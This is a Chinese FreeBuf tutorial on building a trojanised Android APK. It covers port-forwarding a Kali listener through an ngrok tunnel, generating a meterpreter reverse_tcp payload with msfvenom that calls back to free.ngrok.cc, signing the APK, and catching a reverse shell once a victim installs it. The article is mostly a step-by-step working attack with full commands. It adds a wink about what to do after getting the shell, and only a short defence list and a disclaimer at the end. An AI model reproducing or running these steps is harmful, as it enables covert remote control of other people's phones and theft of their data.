*本文原創作者:艾登——皮爾斯,本文屬FreeBuf原創獎勵計劃,未經許可禁止轉載
前言:
因為之前作為小白我不會在KaliLinux裡面把IP映射出外網,卡在那個地方很久,後來解決了這個問題就寫方法出來和大家分享分享。
環境:
KaliLinux系統(https://www.kali.org/downloads/)
Metasploit
NgrokLinux64位的埠轉發工具(https://www.ngrok.cc/)
1.在KaliLinux裡面打開https://www.ngrok.cc,下載裡面的Linux64位的埠轉發工具,到KaliLinux桌面備用
然後小夥伴需要自己去https://www.ngrok.cc/註冊一個帳號來開通一個免費的隧道,用於接下來的埠映射。
2.設置隧道:
隧道協議選擇TCP的,本地埠輸入KaliLinux的IP位址而埠號可以任意不要衝突就行了
設置好ngrok隧道之後就打開指定的sunny路徑運行埠轉髮腳本。
./sunnyclientidid
這個是埠轉髮腳本成功運行的樣子
3.用Metasploit生成載有惡意Payload的Android的apk並且籤名apk:
在KaliLinux裡面打開一個新的窗口輸入
msfvenom-pandroid/meterpreter/reverse_tcpLHOST=free.ngrok.ccLPORT=11***R>/root/Desktop/123.apk
執行下列命令籤名。首先使用密鑰工具創建密鑰庫。
keytool-genkey-v-keystoremy-release-key.Keystore-aliasalias_name-keyalgRSA-keysize2048-validity10000
然後使用JARsigner籤名APK
jarsigner-verbose-sigalgSHA1withRSA-digestalgSHA1-keystoremy-release-key.Keystore123.apkaliasname
再用JARsigner驗證籤名
jarsigner-verify-verbose-certs123.apk
如果你嫌上面的籤名apk的步驟很麻煩就直接在手機下載一個MT管理器進行對apk的籤名既方便又快捷。
4.使用Metasploit進行測試:
接下來啟動metasploit的監聽器。執行msfconsole打開控制臺。
useexploit/multi/handler
SetPAYLOADandroid/meterpreter/reverse_tcp
SETLHOST192.168.253.128(Kali的Linux內網IP)
SETLPORT2222(隧道的埠號)
Exploit
然後將載有payload的APK發送到手機上安裝等待反彈shell
接受反彈shell成功
sessions查看反彈shell
sessions-i[ID]進行回話操作
剩下的大家應該知道怎麼做了(眼神暗示)
注:如果你Kalilinux的內網IP變了,可以直接在隧道修改成你的內網IP然後在setLHOST設置成你內網IP然後run監聽即可。
防範方法:
1.手機沒事儘量不要root。
2.定期更新手機病毒庫,並且進行殺毒。
3.對於一些app申請的不必要的權限可以給予禁止。
4.手機直接安裝個殺毒軟體。
聲明:本文僅供技術交流,請勿利用本文章的攻擊手法對他人進行攻擊,出現一切法律糾紛,與本文作者無關。
*本文原創作者:艾登——皮爾斯,本文屬FreeBuf原創獎勵計劃,未經許可禁止轉載